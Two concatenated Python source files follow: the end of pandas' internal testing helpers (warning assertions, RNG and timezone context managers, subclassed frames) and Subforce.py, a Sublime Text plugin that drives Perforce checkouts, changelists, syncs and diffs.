* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
Subforce.py
|
# Useful documentation:
# Sublime Plugin Framework: http://docs.sublimetext.info/en/latest/reference/plugins.html
# Sublime Plugin Python API: http://www.sublimetext.com/docs/3/api_reference.html
# Perforce API: https://www.perforce.com/perforce/r16.1/manuals/cmdref
# Perforce Python API: https://www.perforce.com/perforce/doc.current/manuals/p4script/03_python.html
# Example Plugin: https://github.com/SideBarEnhancements-org/SideBarEnhancements/blob/st3/SideBar.py
import sublime
import sublime_plugin
import P4
import os
import sys
import threading
import subprocess
import re
import tempfile
from .utilities import \
getAllViewsForPath, \
coercePathsToActiveViewIfNeeded, \
getRevisionQualifiedDepotPath, \
checkForAndGetSinglePath, \
ellipsizeIfDirectory, \
createRevision
NEW_CHANGELIST_NAME = "new"
NEW_CHANGELIST_DESCRIPTION = "Creates a new changelist."
DEFAULT_CHANGELIST_NAME = "default"
DEFAULT_CHANGELIST_DESCRIPTION = "The default changelist."
HAVE_REVISION_NAME = "have"
HAVE_REVISION_DESCRIPTION = "The currently synced revision."
HEAD_REVISION_NAME = "head"
HEAD_REVISION_DESCRIPTION = "The most recently checked-in revision."
FILE_CHECKED_OUT_SETTING_KEY = "subforce_file_checked_out"
FILE_NOT_IN_DEPOT_SETTING_KEY = "subforce_file_not_in_depot"
CHANGELIST_NUMBER_STATUS_KEY = "subforce_changelist_number"
CURRENT_WORKING_DIRECTORY_SETTING_KEY = 'current_working_directory'
DISPLAY_WARNINGS_SETTING_KEY = 'display_warnings'
USE_CONNECTION_INFO_SETTINGS_KEY = 'use_connection_info'
CONNECTION_INFO_PORT_SETTINGS_KEY = 'connection_info_port'
CONNECTION_INFO_USER_SETTINGS_KEY = 'connection_info_user'
CONNECTION_INFO_CLIENT_SETTINGS_KEY = 'connection_info_client'
DISABLE_AUTO_CHECKOUT_SETTINGS_KEY = 'disable_auto_checkout'
class SettingsWrapper(object):
def __init__(self):
self._settings = sublime.load_settings("Subforce.sublime-settings")
def __getattr__(self, name):
return getattr(self._settings, name)
def getOrThrow(self, name):
setting = self._settings.get(name)
if setting is None:
raise P4.P4Exception("Subforce: You must set the {} setting!".format(name))
return setting
class PerforceWrapper(object):
def __init__(self, squelchErrorAndWarninMessages=False):
self._p4 = P4.P4()
self._settings = SettingsWrapper()
currentWorkingDirectorySetting = self._settings.get(CURRENT_WORKING_DIRECTORY_SETTING_KEY, None)
projectPath = sublime.active_window().extract_variables()['folder']
self._p4.cwd = currentWorkingDirectorySetting if currentWorkingDirectorySetting else projectPath
self._p4.exception_level = 1 # Only errors are raised as exceptions. Warnings are accessed through p4.warnings
self._p4.api_level = 79 # Lock to 2015.2 format
self._contextManagerEnterLevel = 0
self._squelchErrorAndWarninMessages = squelchErrorAndWarninMessages
def __getattr__(self, name):
attribute = getattr(self._p4, name)
return attribute
def __enter__(self):
if self._contextManagerEnterLevel == 0:
try:
if self._settings.get(USE_CONNECTION_INFO_SETTINGS_KEY, False):
self._p4.port = self._settings.getOrThrow(CONNECTION_INFO_PORT_SETTINGS_KEY)
self._p4.user = self._settings.getOrThrow(CONNECTION_INFO_USER_SETTINGS_KEY)
self._p4.client = self._settings.getOrThrow(CONNECTION_INFO_CLIENT_SETTINGS_KEY)
self._p4.connect()
except:
if self.__exit__(*sys.exc_info()):
pass
else:
raise
self._contextManagerEnterLevel += 1
return self
def __exit__(self, type, value, traceback):
noErrors = True
if self._contextManagerEnterLevel == 1:
self.handleWarnings()
try:
self._p4.disconnect()
except P4.P4Exception:
print("Subforce: failed to disconnect!")
noErrors = self.handleErrors(type, value, traceback)
self._contextManagerEnterLevel -= 1
return noErrors
def login(self, password):
self._p4.password = password
with self as p4:
p4.run_login()
print("Subforce: sucessfully logged in!")
def handleWarnings(self):
displayWarningsSetting = self._settings.get(DISPLAY_WARNINGS_SETTING_KEY, True)
if not self._squelchErrorAndWarninMessages and displayWarningsSetting:
for warning in self._p4.warnings:
sublime.message_dialog(str(warning))
def handleErrors(self, type, value, traceback):
noErrors = True
if type is P4.P4Exception:
if not self._squelchErrorAndWarninMessages:
sublime.error_message(str(value))
noErrors = False
elif type is not None:
noErrors = False
else:
noErrors = True
return noErrors
def pathUnderRoot(self, path):
try:
stat = self._p4.run_fstat(path)
# Sometimes an empty array is returned instead of an exception
if stat:
return True
else:
return False
except P4.P4Exception:
return False
def plugin_loaded():
print("Subforce: plugin loaded!")
def plugin_unloaded():
print("Subforce: plugin unloaded!")
class SubforceDisplayDescriptionCommand(sublime_plugin.TextCommand):
def run(self, edit, description = ""):
# Enable editing momentarily to set description
self.view.set_read_only(False)
self.view.replace(edit, sublime.Region(0, self.view.size()), description)
self.view.sel().clear()
self.view.set_read_only(True)
class DescriptionOutputPanel(object):
_outputPanelName = 'description_output_panel'
_qualifiedOutputPanelName = 'output.description_output_panel'
_outputPanelCreationLock = threading.Lock()
def __init__(self, window):
self._outputPanelCreationLock.acquire(blocking=True, timeout=1)
self._window = window
self._descriptionOutputPanel = self._window.find_output_panel(self._outputPanelName)
if not self._descriptionOutputPanel:
self._descriptionOutputPanel = self._window.create_output_panel(self._outputPanelName, True)
self._descriptionOutputPanel.settings().set("is_description_output_panel", True)
self._outputPanelCreationLock.release()
def show(self, description):
self._window.run_command(
"show_panel",
{
"panel": self._qualifiedOutputPanelName
}
)
self._descriptionOutputPanel.run_command(
"subforce_display_description",
{
"description": description
}
)
def hide(self):
self._window.run_command(
"hide_panel",
{
"panel": self._qualifiedOutputPanelName,
"cancel": True
}
)
class ChangelistManager(object):
def __init__(self, window, perforceWrapper):
self._window = window
self._perforceWrapper = perforceWrapper
self._changelistDescriptionOutputPanel = DescriptionOutputPanel(self._window)
def viewAllChangelists(self, onDoneCallback, includeNew=False, includeDefault=False):
with self._perforceWrapper as p4:
changelists = []
if includeNew:
changelists.append({"change": NEW_CHANGELIST_NAME, "desc": NEW_CHANGELIST_DESCRIPTION})
if includeDefault:
changelists.append({"change": DEFAULT_CHANGELIST_NAME, "desc": DEFAULT_CHANGELIST_DESCRIPTION})
changelists.extend(p4.run_changes("-c", p4.client, "-s", "pending", "-l"))
def onCreatedChangelist(number):
if onDoneCallback and number:
onDoneCallback(number)
SubforceStatusUpdatingEventListener.updateStatus(self._window.active_view())
def onDone(selectedIndex):
self._changelistDescriptionOutputPanel.hide()
selectedChangelistNumber = changelists[selectedIndex]['change'] if selectedIndex >= 0 else None
if selectedChangelistNumber == NEW_CHANGELIST_NAME:
self.createChangelist(onCreatedChangelist)
else:
if onDoneCallback and selectedChangelistNumber:
onDoneCallback(selectedChangelistNumber)
SubforceStatusUpdatingEventListener.updateStatus(self._window.active_view())
def onHighlighted(selectedIndex):
self._changelistDescriptionOutputPanel.show(changelists[selectedIndex]['desc'])
changelistItems = [[changelist['change'], changelist['desc'][:250]] for changelist in changelists]
self._window.show_quick_panel(
changelistItems,
onDone,
sublime.KEEP_OPEN_ON_FOCUS_LOST,
0,
onHighlighted
)
def createChangelist(self, onDoneCallback=None):
return self.editChangelist(None, onDoneCallback)
def editChangelist(self, changelistNumber, onDoneCallback=None):
with self._perforceWrapper as p4:
caption = 'New Changelist Description'
description = '<new changelist>'
if changelistNumber:
changeResult = p4.fetch_change(changelistNumber)
caption = 'Changelist {} Description'.format(changelistNumber)
description = changeResult['Description'].strip()
def onDescriptionEntered(desc):
with self._perforceWrapper as p4:
if changelistNumber:
changeResult = p4.fetch_change(changelistNumber)
changeResult['Description'] = desc
changeResult = p4.save_change(changeResult)[0]
else:
changeResult = p4.fetch_change()
changeResult['Description'] = desc
changeResult['Files'] = []
changeResult = p4.save_change(changeResult)[0]
changeResultRE = r'Change (\d+) (updated|created).'
changeResultMatch = re.match(changeResultRE, changeResult)
assert changeResultMatch and changeResultMatch.group(1).isdigit()
newChangeNumber = changeResultMatch.group(1)
if onDoneCallback:
onDoneCallback(newChangeNumber)
if changelistNumber:
self._window.status_message('Edited changelist ' +
newChangeNumber)
else:
self._window.status_message('Created new changelist ' +
newChangeNumber)
self._window.show_input_panel(caption, description,
onDescriptionEntered, None, None)
def deleteChangelist(self, changelistNumber):
with self._perforceWrapper as p4:
p4.run_change("-d", changelistNumber)
def moveToChangelist(self, changelistNumber, file):
with self._perforceWrapper as p4:
p4.run_reopen("-c", changelistNumber, file)
def checkoutInChangelist(self, changelistNumber, path):
with self._perforceWrapper as p4:
if changelistNumber == DEFAULT_CHANGELIST_NAME:
p4.run_edit(path)
else:
p4.run_edit("-c", changelistNumber, path)
def revertFilesInChangelist(self, changelistNumber):
with self._perforceWrapper as p4:
p4.run_revert("-c", changelistNumber, "//...")
def addToChangelist(self, changelistNumber, file):
with self._perforceWrapper as p4:
if changelistNumber == DEFAULT_CHANGELIST_NAME:
p4.run_add(changelistNumber, file)
else:
p4.run_add("-c", changelistNumber, file)
class SubforceAutoCheckoutEventListener(sublime_plugin.EventListener):
def on_pre_save(self, view):
if SettingsWrapper().get(DISABLE_AUTO_CHECKOUT_SETTINGS_KEY, False):
return
with PerforceWrapper() as p4:
fileName = view.file_name()
settings = view.settings()
if not fileName or \
settings.get(FILE_NOT_IN_DEPOT_SETTING_KEY, False) or \
settings.get(FILE_CHECKED_OUT_SETTING_KEY, False):
return
# check if file is in depot
if p4.pathUnderRoot(fileName):
stat = p4.run_fstat(fileName)
# check if file is already checked out
if len(stat) > 0 and 'action' in stat[0]:
# Cache this setting, so we don't run fstat unnecessarily
settings.set(FILE_CHECKED_OUT_SETTING_KEY, True)
return
else:
# More caching!
settings.set(FILE_NOT_IN_DEPOT_SETTING_KEY, True)
return
checkoutFile = sublime.ok_cancel_dialog(
"You are saving a file in your depot. Do you want to check it out first?",
"Checkout"
)
if checkoutFile:
# Because Sublime's show_quick_panel is non-blocking, we cannot use it to acquire the user's desired
# changelist before checking out the actual file. Instead, we check out the file first and then move it to
# the user's desired changelist.
p4.run_edit(fileName)
view.settings().set(FILE_CHECKED_OUT_SETTING_KEY, True)
else:
return
moveToChangelist = sublime.ok_cancel_dialog(
"You're file has been checked out in the default changelist. Do you want to move it to another changelist?",
"Move"
)
if moveToChangelist:
view.window().run_command(
"subforce_move_to_changelist",
{
"paths": [fileName]
}
)
@classmethod
def eraseAutoCheckoutEventListenerSettings(self, view):
settings = view.settings()
settings.erase(FILE_CHECKED_OUT_SETTING_KEY)
settings.erase(FILE_NOT_IN_DEPOT_SETTING_KEY)
def on_load(self, view):
self.eraseAutoCheckoutEventListenerSettings(view)
class SubforceStatusUpdatingEventListener(sublime_plugin.EventListener):
# Some of these may be redundant. Meh.
def on_activated_async(self, view):
self.updateStatus(view)
def on_deactivated_async(self, view):
self.updateStatus(view)
def on_post_window_command(self, window, commandName, args):
if commandName.startswith("subforce"):
self.updateStatus(window.active_view())
@classmethod
def updateStatus(self, view):
settings = view.settings()
try:
with PerforceWrapper(squelchErrorAndWarninMessages=True) as p4:
stat = None
# check if file is in depot
if p4.pathUnderRoot(view.file_name()):
stat = p4.run_fstat(view.file_name())
stat = stat[0]
else:
return
if "change" in stat:
view.set_status(
CHANGELIST_NUMBER_STATUS_KEY,
"Changelist Number: {}".format(stat['change'])
)
else:
view.erase_status(CHANGELIST_NUMBER_STATUS_KEY)
except P4.P4Exception: # Squelch all Perforce exceptions
pass
class SubforceLoginCommand(sublime_plugin.WindowCommand):
savedPasswordCharacters = []
def run(self):
def onDone(password):
PerforceWrapper().login("".join(self.savedPasswordCharacters))
def onChange(password):
nextPasswordCharacter = password[len(self.savedPasswordCharacters):]
if len(password) < len(self.savedPasswordCharacters):
self.savedPasswordCharacters.pop()
elif len(password) > len(self.savedPasswordCharacters):
self.savedPasswordCharacters.append(nextPasswordCharacter)
else:
return
hiddenPassword = '*' * len(password)
self.window.show_input_panel(
"Password",
hiddenPassword,
onDone,
onChange,
None
)
self.window.show_input_panel(
"Password",
"",
onDone,
onChange,
None
)
class SubforceSyncCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
with PerforceWrapper() as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
dirtyOpenFiles = (view.file_name() for window in sublime.windows() for view in window.views() if view.is_dirty())
dirtyFileInSyncPath = False
for dirtyOpenFile in dirtyOpenFiles:
for path in paths:
if os.path.commonprefix([path, dirtyOpenFile]) == path:
dirtyFileInSyncPath = True
break
performSync = not dirtyFileInSyncPath or \
sublime.ok_cancel_dialog("You are about to sync over one or more files with unsaved modifications. Are you sure you want to proceed?")
paths = [ellipsizeIfDirectory(path) for path in paths]
if performSync:
# @TODO: Add a configurable logging system
print("Subforce: syncing\n\t{}".format("\n\t".join(paths)))
p4.run_sync(paths)
class SubforceAddCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: adding\n\t{}\nto changelist {}: ".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.addToChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceGetRevisionCommand(sublime_plugin.WindowCommand):
def run(self, paths):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
with perforceWrapper as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
path = ellipsizeIfDirectory(path)
def onDoneCallback(selectedRevision):
revisionManager.getRevision(selectedRevision, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback)
class SubforceCheckoutCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: checking out\n\t{}\nin changelist {}: ".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.checkoutInChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceRevertCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
with PerforceWrapper() as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
ellipsizedPaths = [ellipsizeIfDirectory(path) for path in paths]
print("Subforce: reverting\n\t{}".format("\n\t".join(ellipsizedPaths)))
p4.run_revert(ellipsizedPaths)
self._resetAutoCheckoutEventListenerSettingsForAllViews(paths)
def _resetAutoCheckoutEventListenerSettingsForAllViews(self, paths):
for path in paths:
for view in getAllViewsForPath(path):
SubforceAutoCheckoutEventListener.eraseAutoCheckoutEventListenerSettings(view)
class SubforceRenameCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
with perforceWrapper as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
path = ellipsizeIfDirectory(path)
if not p4.pathUnderRoot(path):
requiresCheckout = True
else:
requiresCheckout = False
if requiresCheckout and not \
sublime.ok_cancel_dialog(
"File must be checked out before it can be renamed. Do you want to check it out now?",
"Checkout"
):
return
def renameFile(file):
def onDoneRenameCallback(newFileName):
with perforceWrapper as p4: # necessary because the callback runs in a different thread
p4.run_rename(file, newFileName)
self.window.show_input_panel(
"New File Name",
file,
onDoneRenameCallback,
None,
None
)
if requiresCheckout:
def onDoneViewingChangelistsCallback(selectedChangelistNumber):
changelistManager.checkoutInChangelist(selectedChangelistNumber, path)
renameFile(path)
changelistManager.viewAllChangelists(onDoneViewingChangelistsCallback, includeNew=True, includeDefault=True)
else:
renameFile(path)
class SubforceViewChangelistsCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
ChangelistManager(self.window, perforceWrapper).viewAllChangelists(None)
class SubforceCreateChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
ChangelistManager(self.window, perforceWrapper).createChangelist()
class SubforceEditChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: editing {}".format(selectedChangelistNumber))
changelistManager.editChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceDeleteChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: deleting {}".format(selectedChangelistNumber))
changelistManager.deleteChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceMoveToChangelistCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: moving\n\t{}\nto changelist {}".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.moveToChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceRevertFilesInChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: reverting files in {}".format(selectedChangelistNumber))
changelistManager.revertFilesInChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
def executeP4VCCommand(command, *args):
with PerforceWrapper() as p4:
command = " ".join(["p4vc.exe", command] + list(args))
print("Subforce: executing p4vc command '{}'".format(command))
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd=p4.cwd)
stdout, stderr = process.communicate()
if stdout:
print(stdout)
if stderr:
print(stderr)
def executeP4VCommand(command, *args):
# See: https://www.perforce.com/blog/vcs/p4v-secrets-calling-p4v-command-line
with PerforceWrapper() as p4:
command = 'p4v.exe -p {} -c {} -u {} -cmd "{}"'.format(
p4.port,
p4.client,
p4.user,
' '.join([command] + list(args))
)
print("Subforce: executing p4v command '{}'".format(command))
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd=p4.cwd)
class SubforceViewRevisionHistoryCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
for path in paths:
executeP4VCommand("history", path)
class SubforceViewTimelapseCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
for path in paths:
executeP4VCommand("annotate", path)
class SubforceSubmitChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
if selectedChangelistNumber:
executeP4VCCommand("submit", "-c", selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceResolveCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
executeP4VCCommand("resolve", " ".join(paths))
class RevisionManager:
def __init__(self, window, perforceWrapper):
self._window = window
self._perforceWrapper = perforceWrapper
self._revisionDescriptionOutputPanel = DescriptionOutputPanel(self._window)
self._callbackDepth = 0
def diffClientFileAgainstDepotRevision(self, revision, file):
with self._perforceWrapper as p4:
depotFilePath = p4.run_fstat(file)[0]['depotFile']
temporaryDepotFilePath = self._createTemporaryDepotFile(depotFilePath, revision)
self._startP4MergeThread(
temporaryDepotFilePath,
file,
getRevisionQualifiedDepotPath(depotFilePath, revision),
"{} (workspace file)".format(file)
)
def diffDepotRevisions(self, revision1, revision2, file):
with self._perforceWrapper as p4:
(revision1, revision2) = sorted([revision1, revision2]) # ensures the most recent revision is on the right
depotFilePath = p4.run_fstat(file)[0]['depotFile']
temporaryDepotFilePath1 = self._createTemporaryDepotFile(depotFilePath, revision1)
temporaryDepotFilePath2 = self._createTemporaryDepotFile(depotFilePath, revision2)
self._startP4MergeThread(
temporaryDepotFilePath1,
temporaryDepotFilePath2,
getRevisionQualifiedDepotPath(depotFilePath, revision1),
getRevisionQualifiedDepotPath(depotFilePath, revision2)
)
def showHaveHeadRevisions(self, onDoneCallback):
revisions = [{'revision': HAVE_REVISION_NAME, 'desc': HAVE_REVISION_DESCRIPTION}, {'revision': HEAD_REVISION_NAME, 'desc': HEAD_REVISION_DESCRIPTION}]
self._showRevisions(revisions, onDoneCallback)
def showHaveHeadAndFileRevisions(self, file, onDoneCallback):
with self._perforceWrapper as p4:
revisions = [createRevision(HAVE_REVISION_NAME, HAVE_REVISION_DESCRIPTION), createRevision(HEAD_REVISION_NAME, HEAD_REVISION_DESCRIPTION)]
revisions.extend(
[
createRevision(str(revision.rev), revision.desc)
for revision in p4.run_filelog("-l", file)[0].revisions
]
)
self._showRevisions(revisions, onDoneCallback)
def getRevision(self, revision, file):
with self._perforceWrapper as p4:
depotFilePath = p4.run_fstat(file)[0]['depotFile']
p4.run_sync(getRevisionQualifiedDepotPath(depotFilePath, revision))
def _showRevisions(self, revisions, onDoneCallback):
self._callbackDepth += 1
def onDone(selectedIndex):
selectedRevision = revisions[selectedIndex]['revision'] if selectedIndex >= 0 else None
if onDoneCallback and selectedRevision:
onDoneCallback(selectedRevision)
if self._callbackDepth == 1: # last one out turns off the lights.
self._revisionDescriptionOutputPanel.hide()
self._callbackDepth -= 1
def onHighlighted(selectedIndex):
self._revisionDescriptionOutputPanel.show(revisions[selectedIndex]['desc'])
revisionItems = [[revision['revision'], revision['desc'][:250]] for revision in revisions]
self._window.show_quick_panel(
revisionItems,
onDone,
sublime.KEEP_OPEN_ON_FOCUS_LOST,
0,
onHighlighted
)
def _startP4MergeThread(self, leftFile, rightFile, leftFileAlias, rightFileAlias):
def target():
command = ["p4merge.exe", '-nl', leftFileAlias, '-nr', rightFileAlias, leftFile, rightFile]
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
print(stdout)
if stderr:
print(stderr)
threading.Thread(target=target).start()
